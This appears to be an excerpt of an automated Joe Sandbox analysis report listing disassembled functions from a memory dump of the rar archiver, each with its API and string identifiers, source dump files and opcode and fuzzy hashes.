                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                      • String ID: rtmp%d
                                                                                                                                                                      • API String ID: 2308737092-3303766350
                                                                                                                                                                      • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                      • Instruction ID: cf72bd9534dfee9adcffb53273e14b9f15d353ded13e6dc32b07bcc04061cdfa
                                                                                                                                                                      • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                      • Instruction Fuzzy Hash: E7519523A1898744EF709B21D8406FE2351FF60795F460031F94DD7A9ADEBEE629C309
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                      • String ID: rar -ioff
                                                                                                                                                                      • API String ID: 4151682896-4089728129
                                                                                                                                                                      • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                      • Instruction ID: 6e4747095d9818023d888f3878d0b80c59714f0eb3cc208d4a7bb03e3a420804
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B014F2A96DA07C3FF14DB70E4547352352AF65702F460835F90EC6194DFAFA064CA5A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                      • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                      • API String ID: 667068680-1824683568
                                                                                                                                                                      • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                      • Instruction ID: 859d81b0c2532842e549936dd309a0ec27b5e97b654d250f42929ceebc467cb9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF06D26A4DB8681EF009B51F8402762361BF59BC0F4A5434FD1D87768EEAEE065C306
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE791ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: +$-
                                                                                                                                                                      • API String ID: 3215553584-2137968064
                                                                                                                                                                      • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                      • Instruction ID: 1c8e7afe2371451cf7d6f94dc55964aa909ef914c2b8bc950d28a4aefbd46a22
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D127227E0958345FF24A619E0443B82656EF20764FCB4632E69AC36C0DFAFE571C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE74E49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2092471728-0
                                                                                                                                                                      • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                      • Instruction ID: e83d4577728b4177a4247d49375aef17222874f4d2c7099ce7c7fda68e94f4de
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D51823360864186EF20CF15E44026AB3A5FB94BA4F110236FE9D87B98DF7DD465CB06
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77BC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2092733347-0
                                                                                                                                                                      • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                      • Instruction ID: e274bf70c45b8bcc27b0889333c1cb8c5d9b61e4ce5823a69bd901d30f6154ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                      • Instruction Fuzzy Hash: 89517BB3F146518AEB54CFB4D4402AC3BB1F708789B51403AEE0E96B98EF79D565CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE76EB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                      • API String ID: 0-13699710
                                                                                                                                                                      • Opcode ID: 64fd0a9c721559b69046ad3ad4575efaf5bbe3996228d2347e7f21f9d6138edc
                                                                                                                                                                      • Instruction ID: 015328c98f98a6f3ab75c1d23312ea64b67eca9c288821f462d8eac28750056a
                                                                                                                                                                      • Opcode Fuzzy Hash: 64fd0a9c721559b69046ad3ad4575efaf5bbe3996228d2347e7f21f9d6138edc
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C81B823A1C68345EF20DB64D4153F92392FBA13C8F424131F94D876CADEAEE625C71A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE78E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                      • API String ID: 3913153233-629598281
                                                                                                                                                                      • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                      • Instruction ID: ed572d58e0aad83ed009d4b61fa5ed12d901753a4acb474d82d22bfeab2c1a6f
                                                                                                                                                                      • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                      • Instruction Fuzzy Hash: DE61D333B0865286EF18DB51E844B79A791FB747D4F168530EE0A87744DFBAE850C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE74EA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Security$File$DescriptorLength
                                                                                                                                                                      • String ID: $ACL
                                                                                                                                                                      • API String ID: 2361174398-1852320022
                                                                                                                                                                      • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                      • Instruction ID: 649fbb0c60015fb75a3d88fac80f5553dee15d72173bab1d430f8bc1ccdbd4fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6231A663B0868182EF20DB11E4543E973A5FBA8784F810032FA8D83759DF7EE525C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77BE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                      • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                      • API String ID: 1364621626-1794493780
                                                                                                                                                                      • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                      • Instruction ID: 7ef5930808ebf239dc64b3979465a68e614602d1e9ea4a381b47f25b0492b458
                                                                                                                                                                      • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                      • Instruction Fuzzy Hash: 1821D376A182418AEB50CF64E480B9D7BF0F758794F154022FE4893B48EB7AE951CF15
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7924D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                      • Instruction ID: 19d6f2c6021bf1e7e7a0f77f3775ae9798a62ae7ee8205c66b69e90729b937b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0C863A1878281EF449B10F4543792360FF98780F061439F90FC2754DEBED464C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE79C654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
